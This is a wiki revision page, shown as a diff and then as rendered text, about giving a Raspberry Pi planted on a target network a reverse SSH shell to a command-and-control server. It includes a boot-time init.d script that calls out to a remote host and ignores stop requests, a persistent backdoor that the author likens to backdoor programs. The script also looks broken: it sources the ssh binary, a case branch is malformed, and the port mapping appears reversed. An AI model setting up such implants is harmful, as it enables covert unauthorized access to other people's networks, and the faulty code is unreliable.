RaspberryPi/Reverse SSH: Difference between revisions
From charlesreid1
(Created page with "How to control the Pi once it is placed on a target network? SSH is an obvious way. Incoming SSH connections can/will be blocked by firewalls or other security measures. Rev...") |
No edit summary |
||
| Line 1: | Line 1: | ||
This article covers how to get a reverse SSH shell to a Raspberry Pi. | |||
=Reverse SSH Shell= | |||
How to control the Pi once it is placed on a target network? SSH. But how? | |||
Incoming SSH connections (from a command and control server to the Raspberry Pi) can be blocked by firewalls/security measures. | |||
Reverse SSH is a good alternative: instead of the command and control server connecting to the Raspberry Pi, the Raspberry Pi initiates the connection to the command and control server. This is the same technique used by many backdoor programs. | |||
=SSH Command= | |||
The command and control server listens for the Pi. When the Pi is online, it calls the ssh command and connects to the remote command and control server. | The command and control server listens for the Pi. When the Pi is online, it calls the ssh command and connects to the remote command and control server. | ||
| Line 29: | Line 32: | ||
Finally, the <code>username@remoteserver</code> enables us to create an SSH connection to the remote server in the first place. | Finally, the <code>username@remoteserver</code> enables us to create an SSH connection to the remote server in the first place. | ||
=Reverse SSH on Startup= | |||
You can run this command on startup, so that on boot, the Pi will attempt to connect to a remote server if it is available. | |||
First, we'll create a startup service that initiates a reverse SSH connection. | |||
Then, we'll give it a whirl. | |||
==Add Reverse SSH Startup Service== | |||
The following instructions will walk through how to create a reverse SSH startup service on the Raspberry Pi, so that the Pi will automatically seek out and create a reverse SSH connection on boot, if the remote server can be found. | |||
This is done by editing the Linux partition of the SD card (not the 64 MB boot partition - the ~3 GB Linux partition!) and changing some files in the init.d sequence. | |||
===Mount SD Card=== | |||
First, insert the Raspberry Pi SD card into your laptop and mount the volume. | |||
===Create Reverse SSH Service=== | |||
Now you'll create a reverse SSH service in <code>/sdcard/etc/init.d/</code>. I called mine reverse-ssh. | |||
<source lang="bash"> | |||
#!/bin/sh | |||
### BEGIN INIT INFO | |||
# Provides: reverse-ssh | |||
# Required-Start: $remote_fs $syslog | |||
# Required-Stop: $remote_fs $syslog | |||
# Default-Start: 2 3 4 5 | |||
# Default-Stop: | |||
# Short-Description: Reverse SSH | |||
### END INIT INFO | |||
set -e | |||
PARAM=/usr/bin/ssh | |||
if [ -f $PARAM ]; then | |||
. "$PARAM" | |||
fi | |||
case "${1:-}" in | |||
stop|reload|restart|force-reload) | |||
echo "Too bad." | |||
start) | |||
echo "Opening reverse shell." | |||
/usr/bin/ssh -R 22:localhost:2222 charles@10.0.0.19;; | |||
*) | |||
echo "Usage: ${0:-} {start|stop|status|restart|reload|force-reload}" >&2 | |||
exit 1 | |||
;; | |||
esac | |||
</source> | |||
Revision as of 04:36, 4 August 2015
This article covers how to get a reverse SSH shell to a Raspberry Pi.
Reverse SSH Shell
How to control the Pi once it is placed on a target network? SSH. But how?
Incoming SSH connections (from a command and control server to the Raspberry Pi) can be blocked by firewalls/security measures.
Reverse SSH is a good alternative: instead of the command and control server connecting to the Raspberry Pi, the Raspberry Pi initiates the connection to the command and control server. This is the same technique used by many backdoor programs.
SSH Command
The command and control server listens for the Pi. When the Pi is online, it calls the ssh command and connects to the remote command and control server.
Normally, when you SSH to a machine, you execute a command like:
$ ssh user@remoteserver
But if you use the -R flag, it enables a reverse connection to the listener.
$ ssh -R [bind_address:]port:host:hostport username@remoteserver
Let's ignore bind_address for now.
The port indicates which port on your Raspberry Pi you want to use to get out of the network. Port 22 is the standard SSH port, but this may not be open on the network firewall that your Pi is on. Pick a port you know will be open and use that for port.
host indicates the destination for the tunnel. Once we SSH from the Raspberry Pi into the command and control server, our tunnel is entirely local. So we create a local tunnel from port to hostport. And our host is localhost.
Finally, the username@remoteserver enables us to create an SSH connection to the remote server in the first place.
Reverse SSH on Startup
You can run this command on startup, so that on boot, the Pi will attempt to connect to a remote server if it is available.
First, we'll create a startup service that initiates a reverse SSH connection.
Then, we'll give it a whirl.
Add Reverse SSH Startup Service
The following instructions will walk through how to create a reverse SSH startup service on the Raspberry Pi, so that the Pi will automatically seek out and create a reverse SSH connection on boot, if the remote server can be found.
This is done by editing the Linux partition of the SD card (not the 64 MB boot partition - the ~3 GB Linux partition!) and changing some files in the init.d sequence.
Mount SD Card
First, insert the Raspberry Pi SD card into your laptop and mount the volume.
Create Reverse SSH Service
Now you'll create a reverse SSH service in /sdcard/etc/init.d/. I called mine reverse-ssh.
#!/bin/sh
### BEGIN INIT INFO
# Provides: reverse-ssh
# Required-Start: $remote_fs $syslog
# Required-Stop: $remote_fs $syslog
# Default-Start: 2 3 4 5
# Default-Stop:
# Short-Description: Reverse SSH
### END INIT INFO
set -e
PARAM=/usr/bin/ssh
if [ -f $PARAM ]; then
. "$PARAM"
fi
case "${1:-}" in
stop|reload|restart|force-reload)
echo "Too bad."
start)
echo "Opening reverse shell."
/usr/bin/ssh -R 22:localhost:2222 charles@10.0.0.19;;
*)
echo "Usage: ${0:-} {start|stop|status|restart|reload|force-reload}" >&2
exit 1
;;
esac